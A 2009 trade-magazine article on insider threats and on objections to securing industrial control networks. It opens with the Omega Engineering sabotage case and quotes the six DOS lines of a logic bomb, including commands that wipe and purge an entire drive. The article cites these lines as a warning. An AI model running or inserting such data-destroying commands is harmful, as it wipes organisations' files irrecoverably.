Costly Insider Security Breaches

By Frank Dickman, BSMAE, RCDD | November 2009 Vol. 236 No. 11
Buyer's Guide

A self-taught file system administrator had worked eleven years for Omega Engineering, a government contractor to NASA and the U.S. Navy, when he learned that he would be let go in a few days. The administrator inserted six simple lines of DOS code into the mainframe computer and borrowed the backup tapes. A few weeks after leaving the company, the program deleted every one of company’s mainframe files. The loss value was estimated at $10-12 million. The company never
recovered. Here, in their simplicity, are the six lines of code.
7/30/96
F:
F:\LOGIN\LOGIN 12345
CD\PUBLIC
FIX.EXE /Y F: \*.*
PURGE F:\ /ALL

It took the FBI four years to determine what had been done by whom, and build a case against the administrator.The investigation was longer than his eventual sentence.

Michael Vatis, director, FBI Computer Crime Task Force, said, “All the critical services that our society relies on for its everyday functioning are now dependent on computers. And they are interconnected with each other in ways that are so complicated and so vast that even if you just caused one system to crash, that would have cascading effects on other systems in ways that we can only begin to think about.”

Common Objections To Safeguarding Production Networks

1. “Our production systems are completely isolated from outside access.”
In his book, The Art of Intrusion, hacker Kevin Mittnick clearly explains how even a neophyte can easily gain root (administrator) access to the entire network through the corporation’s protected public website, from anywhere in the world.
The majority of PLCs are currently ordered with Web services enabled, but 87% of users leave the Web servers active, unused (and not configured), with factory default passwords.

2. “Our system is secure because it would be impossible for an outsider to understand it.”
This is nicknamed “security by obscurity” and has repeatedly been shown to be a false assumption. There are only 5-6 leading DCS and SCADA systems used throughout the world, and there are millions of U.S. and foreign engineers who have been trained in their use.

3. “We’re not a likely target. We’re not important or interesting enough to attract hackers.”
Malware (Trojans, viruses and worms) can be inadvertently downloaded from the Internet, and these can replicate themselves on portable memory devices of all types. In 2008, digital picture frames sold by major retailers were found to be infected with a program that disabled antivirus software and sent passwords to servers in China.

4. “We’ve never had a problem. There has been no intrusion or disruption in our production network.”
When new Intrusion Detection Systems (IDS) were installed on U.S. Department of Defense networks, they showed that thousands of attempted illegal penetrations were going on daily. One general was incensed and is supposed to have said, “Before we had these IDS, we were never attacked. Now that we got them on the network, people are attacking our nets every day thousands of times trying to get in! And some of them are getting in!”

5. “We can’t justify the expense and manpower.”
The expense of protection is a fraction of 1% of the information technology (IT) budget. With the latest generation of equipment, a network of protection can be installed--as plug and play--by a handful of technicians rather than IT managers. Production need not be interrupted.